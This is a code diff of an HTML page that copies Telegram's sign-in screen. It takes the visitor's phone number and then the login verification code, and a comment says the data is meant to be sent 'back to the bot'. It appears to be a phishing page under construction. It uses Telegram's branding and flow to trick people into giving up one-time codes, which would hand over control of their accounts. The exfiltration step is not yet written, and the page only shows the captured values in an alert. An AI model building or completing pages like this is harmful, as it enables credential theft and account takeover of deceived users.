--- a/index.html
+++ b/index.html
@@ -27,23 +27,42 @@
         }
 
         .container img {
-            width: 80px;
+            width: 60px;
             margin-bottom: 20px;
         }
 
         h1 {
-            font-size: 24px;
+            font-size: 20px;
             color: #333333;
             margin-bottom: 10px;
         }
 
-        select, input[type="text"] {
+        p {
+            font-size: 14px;
+            color: #777;
+            margin-bottom: 20px;
+        }
+
+        .input-group {
+            margin-bottom: 15px;
+            text-align: left;
+        }
+
+        .input-group label {
+            display: block;
+            font-size: 14px;
+            color: #555;
+            margin-bottom: 5px;
+        }
+
+        select, input[type="text"], input[type="number"] {
             width: 100%;
             padding: 10px;
-            margin: 10px 0;
             border: 1px solid #ccc;
             border-radius: 5px;
             font-size: 16px;
+            box-sizing: border-box;
+            margin-bottom: 10px;
         }
 
         input[type="checkbox"] {
@@ -52,76 +71,116 @@
 
         .button {
             width: 100%;
-            padding: 10px;
+            padding: 12px;
             background-color: #0088cc;
             color: #ffffff;
             border: none;
             border-radius: 5px;
             font-size: 16px;
             cursor: pointer;
-            margin-top: 20px;
+            margin-top: 10px;
         }
 
         .button:hover {
             background-color: #007ab8;
         }
 
-        .qr-code {
-            color: #0088cc;
-            text-decoration: none;
-            margin-top: 10px;
-            display: block;
-            font-size: 14px;
+        .monkey-icon {
+            font-size: 50px;
+            margin-bottom: 20px;
         }
 
-        .qr-code:hover {
-            text-decoration: underline;
+        #verificationContainer {
+            display: none;
         }
     </style>
 </head>
 <body>
-    <div class="container">
+    <div class="container" id="initialContainer">
         <img src="https://upload.wikimedia.org/wikipedia/commons/8/82/Telegram_logo.svg" alt="Telegram Logo">
         <h1>Sign in to Telegram</h1>
         <p>Please confirm your country code and enter your phone number.</p>
 
-        <!-- Country Code Dropdown -->
-        <select id="countryCode">
-            <!-- Option for each country (Sample entries) -->
-            <option value="+61" data-country="Australia">Australia (+61)</option>
-            <option value="+1" data-country="United States">United States (+1)</option>
-            <!-- You will need to add more country options here -->
-        </select>
+        <div class="input-group">
+            <label for="countryCode">Country</label>
+            <!-- Country Code Dropdown -->
+            <select id="countryCode">
+                <option value="+61">🇦🇺 Australia (+61)</option>
+                <option value="+1">🇺🇸 United States (+1)</option>
+                <option value="+44">🇬🇧 United Kingdom (+44)</option>
+                <option value="+49">🇩🇪 Germany (+49)</option>
+                <option value="+33">🇫🇷 France (+33)</option>
+                <option value="+81">🇯🇵 Japan (+81)</option>
+                <option value="+91">🇮🇳 India (+91)</option>
+                <option value="+86">🇨🇳 China (+86)</option>
+                <option value="+7">🇷🇺 Russia (+7)</option>
+                <option value="+82">🇰🇷 South Korea (+82)</option>
+                <!-- Add more countries here -->
+            </select>
+        </div>
 
-        <!-- Phone Number Input -->
-        <input type="text" id="phoneNumber" placeholder="Phone Number">
+        <div class="input-group">
+            <label for="phoneNumber">Phone Number</label>
+            <input type="text" id="phoneNumber" placeholder="Phone Number">
+        </div>
 
-        <!-- Keep Me Signed In Checkbox -->
         <div>
             <input type="checkbox" id="keepSignedIn"> Keep me signed in
         </div>
 
         <!-- Next Button -->
-        <button class="button" onclick="submitForm()">Next</button>
+        <button class="button" onclick="goToVerificationPage()">Next</button>
+    </div>
 
-        <!-- QR Code Login Link -->
-        <a href="#" class="qr-code">Log in by QR code</a>
+    <div class="container" id="verificationContainer">
+        <div class="monkey-icon">🐵</div>
+        <h1 id="phoneDisplay"></h1>
+        <p>We have sent you a message in Telegram with the code.</p>
+
+        <div class="input-group">
+            <label for="verificationCode">Code</label>
+            <input type="number" id="verificationCode" placeholder="Code">
+        </div>
+
+        <!-- Submit Button -->
+        <button class="button" onclick="submitVerification()">Submit</button>
     </div>
 
     <script>
-        document.getElementById('countryCode').addEventListener('change', function() {
-            const selectedOption = this.options[this.selectedIndex];
-            const phoneNumberInput = document.getElementById('phoneNumber');
-            phoneNumberInput.value = selectedOption.value + ' ' + phoneNumberInput.value.replace(/^\+\d+\s*/, '');
-        });
-
-        function submitForm() {
+        function goToVerificationPage() {
             const countryCode = document.getElementById('countryCode').value;
             const phoneNumber = document.getElementById('phoneNumber').value;
-            const keepSignedIn = document.getElementById('keepSignedIn').checked;
+            const fullPhoneNumber = `${countryCode} ${phoneNumber}`;
 
-            alert(`Country Code: ${countryCode}\nPhone Number: ${phoneNumber}\nKeep Signed In: ${keepSignedIn}`);
-            // You can handle the form submission here
+            if (phoneNumber === '') {
+                alert('Please enter your phone number.');
+                return;
+            }
+
+            document.getElementById('phoneDisplay').textContent = fullPhoneNumber;
+
+            document.getElementById('initialContainer').style.display = 'none';
+            document.getElementById('verificationContainer').style.display = 'block';
+        }
+
+        function submitVerification() {
+            const verificationCode = document.getElementById('verificationCode').value;
+            const phoneDisplay = document.getElementById('phoneDisplay').textContent;
+
+            if (verificationCode === '') {
+                alert('Please enter the verification code.');
+                return;
+            }
+
+            // Send data back to the bot
+            // This would typically involve an AJAX request or some other method of communication
+            alert(`Phone Number: ${phoneDisplay}\nVerification Code: ${verificationCode}`);
+
+            // Reset form for another use
+            document.getElementById('initialContainer').style.display = 'block';
+            document.getElementById('verificationContainer').style.display = 'none';
+            document.getElementById('phoneNumber').value = '';
+            document.getElementById('verificationCode').value = '';
         }
     </script>
 </body>
